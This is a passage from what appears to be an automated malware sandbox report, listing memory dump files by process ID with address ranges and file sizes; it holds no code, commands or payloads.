                                                                          • memory/4564-327-0x00000000001D0000-0x00000000001FE000-memory.dmp
                                                                            Filesize

                                                                            184KB

                                                                          • memory/4564-328-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                                            Filesize

                                                                            5.7MB

                                                                          • memory/4584-344-0x0000000000000000-mapping.dmp
                                                                          • memory/4584-359-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4584-350-0x0000000000070000-0x0000000000071000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4596-396-0x000000000046B76D-mapping.dmp
                                                                          • memory/4596-402-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                            Filesize

                                                                            644KB

                                                                          • memory/4652-251-0x0000000000000000-mapping.dmp
                                                                          • memory/4652-256-0x0000000000C00000-0x0000000000CE4000-memory.dmp
                                                                            Filesize

                                                                            912KB

                                                                          • memory/4680-254-0x0000000000000000-mapping.dmp
                                                                          • memory/4688-345-0x0000000000000000-mapping.dmp
                                                                          • memory/4768-263-0x0000000000000000-mapping.dmp
                                                                          • memory/4768-268-0x00000172F7220000-0x00000172F7221000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4824-391-0x0000000077DD0000-0x0000000077F5E000-memory.dmp
                                                                            Filesize

                                                                            1.6MB

                                                                          • memory/4824-375-0x0000000000000000-mapping.dmp
                                                                          • memory/4824-420-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4832-329-0x0000000000000000-mapping.dmp
                                                                          • memory/4832-374-0x0000000000000000-mapping.dmp
                                                                          • memory/4876-376-0x0000000000000000-mapping.dmp
                                                                          • memory/4876-454-0x0000000000B90000-0x0000000000BBF000-memory.dmp
                                                                            Filesize

                                                                            188KB

                                                                          • memory/4892-305-0x0000000005310000-0x0000000005311000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4892-285-0x00000000058A0000-0x00000000058A1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4892-279-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                            Filesize

                                                                            120KB

                                                                          • memory/4892-301-0x0000000005290000-0x0000000005896000-memory.dmp
                                                                            Filesize

                                                                            6.0MB

                                                                          • memory/4892-291-0x00000000052D0000-0x00000000052D1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4892-323-0x0000000005580000-0x0000000005581000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4892-288-0x0000000002E20000-0x0000000002E21000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/4892-280-0x0000000000417E1A-mapping.dmp
                                                                          • memory/4904-272-0x0000000000000000-mapping.dmp
                                                                          • memory/4920-331-0x0000000000000000-mapping.dmp
                                                                          • memory/4980-436-0x0000000000000000-mapping.dmp
                                                                          • memory/5048-276-0x0000000000000000-mapping.dmp
                                                                          • memory/5104-336-0x0000000000000000-mapping.dmp